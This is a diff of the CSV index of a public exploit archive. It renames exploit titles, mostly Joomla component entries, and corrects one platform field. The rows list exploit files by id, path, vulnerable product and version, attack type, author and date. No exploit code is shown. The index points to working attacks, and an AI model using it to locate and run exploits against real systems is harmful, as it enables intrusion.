 20984,platforms/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0
 20985,platforms/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",php,local,0
 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow",2001-07-02,"Christophe Bailleux",linux,local,0
@@ -18529,7 +18529,7 @@ id,file,description,date,author,platform,type,port
 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local,0
 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",linux,local,0
 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0
-21221,platforms/php/webapps/21221.txt,"Joomla! Component RokModule - 'index.php module Parameter' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0
+21221,platforms/php/webapps/21221.txt,"Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0
 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0
 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0
 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0
@@ -19300,7 +19300,7 @@ id,file,description,date,author,platform,type,port
 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0
 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0
 22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album Parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0
-22004,platforms/php/webapps/22004.txt,"Joomla! Component iCagenda - (id Parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
+22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0
 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0
 22006,platforms/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0
 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0
@@ -19388,8 +19388,8 @@ id,file,description,date,author,platform,type,port
 22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal",2012-10-19,xistence,multiple,webapps,0
 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection",2012-10-19,xistence,multiple,remote,0
 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0
-22097,platforms/php/webapps/22097.txt,"Joomla! Component FreeStyle Support com_fss 1.9.1.1447 - SQL Injection",2012-10-19,D4NB4R,php,webapps,0
-22098,platforms/php/webapps/22098.txt,"Joomla! Component Tags - 'index.php tag Parameter' SQL Injection",2012-10-19,D4NB4R,php,webapps,0
+22097,platforms/php/webapps/22097.txt,"Joomla! Component 'com_fss' 1.9.1.1447 - SQL Injection",2012-10-19,D4NB4R,php,webapps,0
+22098,platforms/php/webapps/22098.txt,"Joomla! Component 'com_tag' - 'tag' Parameter SQL Injection",2012-10-19,D4NB4R,php,webapps,0
 22099,platforms/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0
 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0
@@ -19444,8 +19444,8 @@ id,file,description,date,author,platform,type,port
 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0
 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0
-22152,platforms/php/webapps/22152.txt,"Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0
-22153,platforms/php/webapps/22153.pl,"Joomla! Component Kunena - 'index.php search Parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
+22152,platforms/php/webapps/22152.txt,"Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection",2012-10-22,D4NB4R,php,webapps,0
+22153,platforms/php/webapps/22153.pl,"Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0
 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0
 22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0
 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0
@@ -19637,7 +19637,7 @@ id,file,description,date,author,platform,type,port
 22348,platforms/php/webapps/22348.txt,"PHP-Nuke 5.5/6.0 News Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0
 22349,platforms/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0
 22350,platforms/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",hardware,remote,0
-22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - PUT Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0
+22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0
 22352,platforms/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos,0
 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption",2003-03-06,eSDee,linux,remote,0
 22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0
@@ -19688,7 +19688,7 @@ id,file,description,date,author,platform,type,port
 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0
 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0
 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0
-22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0
+22403,platforms/php/webapps/22403.txt,"Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0
 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0
 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0
 22407,platforms/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0
@@ -20511,7 +20511,7 @@ id,file,description,date,author,platform,type,port
 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
-23243,platforms/windows/remote/23243.py,"Free Float FTP Server - USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
+23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0
@@ -20555,7 +20555,7 @@ id,file,description,date,author,platform,type,port
 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote,0
 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0
 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0
-23286,platforms/php/webapps/23286.txt,"Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
+23286,platforms/php/webapps/23286.txt,"Joomla! Component 'com_jooproperty' 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0
 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps,0
@@ -21028,7 +21028,7 @@ id,file,description,date,author,platform,type,port
 23779,platforms/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",linux,dos,0
 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 - Crash (PoC)",2012-12-31,IndonesiaGokilTeam,windows,dos,0
 23781,platforms/php/webapps/23781.txt,"MyBB - 'editpost.php posthash' SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
-23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'index.php date Parameter' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
+23782,platforms/php/webapps/23782.txt,"Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0
 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0
@@ -21462,7 +21462,7 @@ id,file,description,date,author,platform,type,port
 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0
 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote,0
 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0
-24228,platforms/php/webapps/24228.txt,"Joomla! Component com_collector - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0
+24228,platforms/php/webapps/24228.txt,"Joomla! Component 'com_collector' - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0
 24229,platforms/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0
 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",php,webapps,0
 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0
@@ -21704,7 +21704,7 @@ id,file,description,date,author,platform,type,port
 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
-24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
+24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
 24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
@@ -21759,7 +21759,7 @@ id,file,description,date,author,platform,type,port
 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
 24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
-24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0
+24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - 'highlight.php' PHP Object Injection",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Plugin Comment Rating 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
 24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos,0
@@ -22053,7 +22053,7 @@ id,file,description,date,author,platform,type,port
 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0
 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0
-24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles - (cid parameter) SQL Injection",2013-03-18,ByEge,php,webapps,0
+24851,platforms/php/webapps/24851.txt,"Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection",2013-03-18,ByEge,php,webapps,0
 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0
 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0
 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0
@@ -22133,11 +22133,11 @@ id,file,description,date,author,platform,type,port
 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0
 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
 24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,windows,dos,514
-24969,platforms/php/webapps/24969.txt,"Joomla! Component CiviCRM 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0
+24969,platforms/php/webapps/24969.txt,"Joomla! Component 'com_civicrm' 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0
 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0
 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0
 646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0
-24944,platforms/windows/remote/24944.py,"Freefloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
+24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
@@ -22290,7 +22290,7 @@ id,file,description,date,author,platform,type,port
 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",asp,webapps,0
 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0
 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps,0
-25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - (remember.php) PHP Object Injection",2013-04-26,EgiX,php,webapps,0
+25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,php,webapps,0
 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0
 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",windows,remote,0
 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - index.php SQL Injection",2005-02-09,Zeelock,php,webapps,0
@@ -22436,7 +22436,7 @@ id,file,description,date,author,platform,type,port
 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0
 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
-25248,platforms/php/webapps/25248.txt,"Joomla! Extension DJ Classifieds 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0
+25248,platforms/php/webapps/25248.txt,"Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0
 25249,platforms/php/webapps/25249.txt,"Webid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0
 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0
 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0
@@ -22597,7 +22597,7 @@ id,file,description,date,author,platform,type,port
 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Privilege Escalation",2013-05-13,HTP,linux,local,0
 25408,platforms/windows/dos/25408.pl,"Microsoft Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,windows,dos,0
 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
-25410,platforms/php/webapps/25410.txt,"Joomla! Component S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
+25410,platforms/php/webapps/25410.txt,"Joomla! Component 'com_s5clanroster' - 'id' Parameter SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0
 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 / 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
@@ -24580,7 +24580,7 @@ id,file,description,date,author,platform,type,port
 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0
 27403,platforms/php/webapps/27403.txt,"WordPress Plugin Usernoise 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps,0
-27405,platforms/php/webapps/27405.txt,"Joomla! Component Sectionex 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0
+27405,platforms/php/webapps/27405.txt,"Joomla! Component 'com_sectionex' 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0
 27406,platforms/windows/webapps/27406.txt,"McAfee SuperScan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0
 27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",windows,dos,0
 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
@@ -24692,7 +24692,7 @@ id,file,description,date,author,platform,type,port
 27529,platforms/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution (Metasploit)",2013-08-12,Metasploit,php,remote,0
 27530,platforms/multiple/remote/27530.rb,"Squash - YAML Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote,0
 27531,platforms/php/webapps/27531.txt,"WordPress Plugin Hms Testimonials 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0
-27532,platforms/php/webapps/27532.txt,"Joomla! Component redSHOP 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0
+27532,platforms/php/webapps/27532.txt,"Joomla! Component 'com_redshop' 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0
 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0
 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - post.php SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0
 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0
@@ -24765,7 +24765,7 @@ id,file,description,date,author,platform,type,port
 27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
-27610,platforms/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
+27610,platforms/php/remote/27610.rb,"Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80
 27611,platforms/windows/remote/27611.txt,"Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0
 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0
 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0
@@ -28018,7 +28018,7 @@ id,file,description,date,author,platform,type,port
 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
-31057,platforms/osx/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0
+31057,platforms/ios/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,ios,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@@ -30203,7 +30203,7 @@ id,file,description,date,author,platform,type,port
 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",windows,dos,0
 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0
 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0
-33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
+33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0
 33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80
 33390,platforms/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0
